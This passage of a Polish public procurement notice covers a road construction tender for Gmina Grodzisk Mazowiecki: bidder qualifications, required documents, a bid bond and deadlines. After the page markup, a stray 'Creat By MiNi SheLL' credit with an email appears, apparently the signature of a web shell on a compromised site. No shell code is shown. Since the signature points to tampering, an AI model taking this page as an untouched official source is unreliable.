gospodarczym:<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku udziału w postępowaniu w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawi warunku udziału w postępowaniu w powyższym zakresie. <br/><br/>4) zdolności technicznej lub zawodowej:<br/><br/>a) dotyczącej Wykonawcy:<br/> <br/>Warunek zostanie spełniony jeśli wykonawca wykaże, że nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedna robotę budowlaną polegającą budowie/przebudowie/rozbudowie drogi o nawierzchni bitumicznej o wartości min. 6 000 000,00 zł brutto (sześć milionów złotych brutto) w ramach jednej umowy.<br/><br/>Wartości podane w dokumentach potwierdzających spełnienie warunku udziału w postępowaniu w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP z dnia zamieszczenia ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych. <br/><br/>b) dotyczącej osób: <br/><br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia t.j.:<br/><br/>Kierownik Budowy (Przedstawiciel Wykonawcy) posiadający:<br/>• Uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej, lub równoważnych wydanych na podstawie wcześniej obowiązujących przepisów,<br/>• co najmniej 5-letnie doświadczenie zawodowe jako Kierownik robót drogowych.<br/><br/>Kierownik robót sanitarnych posiadający:<br/>• uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub równoważnych wydanych na podstawie wcześniej obowiązujących przepisów,<br/>• co najmniej 2-letnie doświadczenie zawodowe na stanowisku Kierownika robót sanitarnych.<br/><br/>Kierownik robót elektrycznych i elektroenergetycznych posiadający:<br/>• uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważnych wydanych na podstawie wcześniej obowiązujących przepisów, <br/>• co najmniej 2-letnie doświadczenie zawodowe polegające na kierowaniu robotami elektrycznymi i elektroenergetycznymi lub nadzorowaniu robót elektrycznych i elektroenergetycznych.<br/><br/>Uprawnienia posiadane przez osoby wskazane powyżej, w wymaganym zakresie, powinny być zgodne z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333 ze zm.) oraz aktualnym obowiązującym rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. poz. 1278) lub równoważne wydane na podstawie wcześniej obowiązujących przepisów. <br/>W każdym przypadku, gdy wymagane jest posiadanie określonych uprawnień budowlanych, przez osobę wskazaną do pełnienia jakiejkolwiek funkcji wymienionej powyżej, Zamawiający dopuszcza posiadanie przez wskazane osoby:<br/>- uprawnień równoważnych względem wymaganych, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub:<br/>- uprawnień równoważnych względem wymaganych, uznanych przez właściwy organ zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. z 2020 r. poz. 220 ze zm.) lub:<br/>- uprawnień równoważnych względem wymaganych, nabytych w innym niż Rzeczypospolita Polska państwie członkowskim Unii Europejskiej, państwie członkowskim Europejskiego Porozumienia o wolnym Handlu (EFTA),<br/>- stronie umowy o Europejskim Obszarze Gospodarczym lub Konfederacji Szwajcarskiej i której na mocy odrębnych przepisów przysługuje prawo do świadczenia usług transgranicznych na terytorium Rzeczypospolitej Polskiej. <br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: <br/> warunek określony w rozdziale VIII ust. 2 pkt 4) lit. a) musi być spełniony w całości min. przez jednego z Wykonawców,<br/> warunek określony w rozdziale VIII ust. 2 pkt 4) lit. b) musi być spełniony w całości min. przez jednego z Wykonawców.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. Oświadczenie, z którego wynikać będzie, które roboty budowlane wykonają poszczególni Wykonawcy składane będzie w pkt. 10 Formularza Oferty. <br/>Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia braku podstaw<br/>wykluczenia z udziału w postępowaniu obejmują:1) oświadczenie wykonawcy, w zakresie art. 108 ust.<br/>1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia<br/>16.02.2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w<br/>postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej - załącznik nr 6 do SWZ;2) zaświadczenia właściwego naczelnika urzędu<br/>skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie<br/>art. 109 ust. 1 pkt 1 p.z.p., wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w<br/>przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda<br/>złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o<br/>dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca<br/>dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności;3) zaświadczenie albo inny dokument właściwej<br/>terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału<br/>regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i<br/>zdrowotne, w zakresie art. 109 ust. 1 pkt 1 p.z.p., wystawionego nie wcześniej niż 3 miesiące przed<br/>jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub<br/>zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do<br/>udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności<br/>należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat tych należności;4) odpis lub informację z Krajowego<br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art.<br/>109 ust. 1 pkt 4 p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji;2. Jeżeli Wykonawca ma siedzibę lub miejsce<br/>zamieszkania poza terytorium Rzeczypospolitej składa dokumenty zgodnie z postanowieniami<br/>rozdziału X SWZ.3. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby przedkłada także podmiotowe środki dowodowe, które służą potwierdzeniu<br/>braku podstaw do wykluczenia podmiotów udostępniających zasoby, o których mowa w rozdziale X<br/>ust. 6 pkt 2,3,4 SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu obejmują:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – (załącznik nr 3 do SWZ);<br/>2)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 4 do SWZ);</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1 do SWZ. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ;<br/>2)	Wykaz elementów rozliczeniowych załącznik nr 1A;<br/>3) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy);<br/>4) Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz;<br/>5) Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy (jeśli dotyczy).<br/>6)	Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy chyba, że umocowanie do reprezentacji wynika z dokumentów, o których mowa w ust. 4 poniżej. <br/>4. Oferta powinna być podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez upełnomocnionego przedstawiciela Wykonawcy. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru chyba że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu oferty wskaże dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy jak również w odniesieniu do podmiotów udostępniających zasoby. . <br/>5.	Oferta oraz pozostałe oświadczenia i dokumenty, dla których Zamawiający określił wzory w formie formularzy zamieszczonych w załącznikach do SWZ, powinny być sporządzone zgodnie z tymi wzorami, co do treści oraz opisu kolumn i wierszy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium <br/>w wysokości: 30 000,00 zł (słownie: trzydzieści tysięcy złotych 00/100 złotych);<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwalnie do dnia upływu terminu związania ofertą.<br/>3.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu; <br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>5.	Wadium w formie pieniądza należy wnieść przelewem na rachunek bankowy w Banku PEKAO S.A. ul. Grzybowska 53/57 00-950 Warszawa nr 88 1240 6348 1111 0010 4058 8554 z dopiskiem „Wadium – nr postępowania”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>6.	Wadium wnoszone w formie gwarancji lub poręczenia musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p.;<br/>2)	z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem poręczenia lub gwarancji jest: Gmina Grodzisk Mazowiecki<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>7. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>8.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty. 2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w<br/>treści formularza ofertowego (ust. 10) składają oświadczenie, z którego wynika, które roboty<br/>budowlane wykonają poszczególni wykonawcy.3. Oświadczenia i dokumenty potwierdzające<br/>brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy zostały przez Zamawiającego przewidziane we wzorze umowy stanowiącym załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Postępowanie prowadzone jest w formie elektronicznej za pośrednictwem platformy zakupowej dostępnej pod adresem www.platformazakupowa.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-20 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% ceny całkowitej podanej w ofercie.1.	Termin zakończenia realizacji zamówienia ustala się na 12 miesięcy od daty podpisania niniejszej umowy na wykonanie robót. Termin zakończenia realizacji zamówienia rozumiany jest jako data podpisania protokołu odbioru końcowego. <br/>2. Termin zakończenia robót budowlanych ustala się na 14 dni przed datą wskazaną w ust. 1 powyżej. Termin zakończenia robót budowlanych rozumiany jest jako data zgłoszenia Zamawiającemu gotowości do odbioru końcowego wraz z kompletną dokumentacją odbiorową potwierdzoną przez Inspektora nadzoru. Zamawiający wymaga, aby Wykonawca odpowiednio wcześniej zgłosił do jednostki Nadzoru Budowlanego zawiadomienia o zakończeniu budowy dla wszystkich odcinków, przy czym nie zwalnia to Wykonawcy z obowiązku uzupełnienia ewentualnych braków, wyjaśnienia niejasności, wykonania poprawek, itp. w przypadku uwag Nadzoru Budowalnego.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com